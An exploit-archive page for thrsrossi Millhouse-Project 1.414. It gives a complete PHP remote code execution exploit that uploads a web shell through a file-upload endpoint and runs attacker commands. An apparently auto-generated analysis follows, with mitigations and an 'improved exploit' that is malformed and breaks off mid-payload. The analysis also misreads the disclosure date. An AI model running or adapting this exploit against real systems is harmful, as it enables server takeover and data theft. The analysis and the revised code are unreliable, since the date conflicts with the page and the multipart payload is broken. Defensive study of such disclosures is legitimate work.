thrsrossi Millhouse-Project 1.414 - Remote Code Execution

Exploit Author: Chokri Hammedi Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-05-23 
<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/

$options = getopt('u:c:');

if(!isset($options['u'], $options['c']))
die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
\033[0m\n
\n");

$target     =  $options['u'];

$command    =  $options['c'];

$url = $target . '/includes/add_post_sql.php';


$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"

helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"

<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"

1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php

<?php
$shell = shell_exec("' . $command . '");
echo $shell;
?>

------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';

$headers = array(
    'Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
    'Cookie: PHPSESSID=rose1337',
);

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$response = curl_exec($ch);
curl_close($ch);

// execute command

$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";

?>


Thrsrossi Millhouse-Project 1.414: Remote Code Execution Vulnerability Analysis

On December 5, 2023, cybersecurity researcher Chokri Hammedi disclosed a critical vulnerability in thrsrossi Millhouse-Project 1.414, a web-based content management system (CMS) hosted on GitHub. The exploit enables remote code execution (RCE) through a poorly secured file upload mechanism, allowing attackers to execute arbitrary commands on the target server. This vulnerability poses a severe risk to organizations relying on this software for content publishing, particularly in environments where user input is not rigorously validated.

Overview of the Vulnerability

The core flaw lies in the /includes/add_post_sql.php endpoint, which processes multipart form data for adding new posts. The system accepts file uploads with a specific filename and content type, allowing users to submit PHP code disguised as a file. The exploit leverages a misconfigured file upload handler that fails to sanitize or validate the file content before storing it.

Once uploaded, the PHP file — named rose.php — is stored in the /images/ directory. This location is publicly accessible, meaning any attacker can trigger the execution of the embedded code by accessing the file via a query parameter.

Exploit Mechanism Breakdown

The following code snippet demonstrates the attack vector:

Explanation: This exploit uses curl to send a crafted multipart form request to the vulnerable endpoint. The key component is the image field, which uploads a file named rose.php with a Content-Type of application/x-php. The file contains a PHP script that executes the user-provided command via shell_exec() and outputs the result.

The use of PHPSESSID=rose1337 in the cookie header suggests that the application may rely on session persistence for authentication, but this does not prevent the exploit from being executed if the session is valid or if session hijacking is possible.

Attack Workflow

  • Step 1: The attacker constructs a malicious multipart form with a PHP payload disguised as a file.
  • Step 2: The payload is uploaded via the add_post_sql.php endpoint, which fails to verify the file's content type or execute any sandboxing.
  • Step 3: The file rose.php is stored in the /images/ directory, accessible via HTTP.
  • Step 4: The attacker triggers execution by sending a request to http://target.org/images/rose.php?cmd=whoami.
  • Step 5: The server executes the command and returns the output, enabling full remote code execution.

Security Implications and Risk Assessment

This vulnerability is classified as Remote Code Execution (RCE), one of the most dangerous categories in cybersecurity. It allows an attacker to:

  • Gain full control over the server environment.
  • Execute system commands (e.g., whoami, ls, cat /etc/passwd).
  • Deploy backdoors or persistent shells.
  • Exfiltrate sensitive data or escalate privileges.

Given that the software is open-source and hosted on GitHub, the risk is amplified. Organizations using this project without proper security audits may be exposed to unauthorized access, data breaches, or complete system compromise.

Recommended Mitigations

Developers and administrators should implement the following security measures:

  • Disable file uploads for executable content: Restrict file types to non-executable formats (e.g., images, documents).
  • Validate file content: Check for PHP tags, shell commands, or known malicious patterns before storing files.
  • Store uploaded files outside the web root: Prevent direct execution by placing files in non-public directories.
  • Use secure file naming: Avoid predictable filenames like rose.php.
  • Implement input sanitization: Escape or filter user-supplied commands before execution.
  • Disable dangerous functions: Restrict or disable shell_exec(), system(), and eval() in production environments.

Improved Exploit Code (Security-Focused)

While the original exploit is functional, it contains security weaknesses. A safer, more resilient version would:


<?php
// Improved exploit with error handling and better payload structure
$options = getopt('u:c:');

if (!isset($options['u']) || !isset($options['c'])) {
    die("\033[1;32m\n Usage: php exploit.php -u http://target.org/ -c 'whoami'\n\n\033[0m\n");
}

$target = rtrim($options['u'], '/');
$command = $options['c'];

// Construct URL for upload
$url = "{$target}/includes/add_post_sql.php";

// Define multipart boundary
$boundary = '----WebKitFormBoundaryzlHN0BEvvaJsDgh8';

// Build payload with proper escaping
$payload = <<<EOT
--{$boundary}
Content-Disposition: form-data; name="title"
helloworld
--{$boundary}
Content-Disposition: form-data; name="description"
<p>test</p>
--{$boundary}
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

--{$boundary}
Content-Disposition: form-data; name="category"
1
--{$boundary}
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/x-php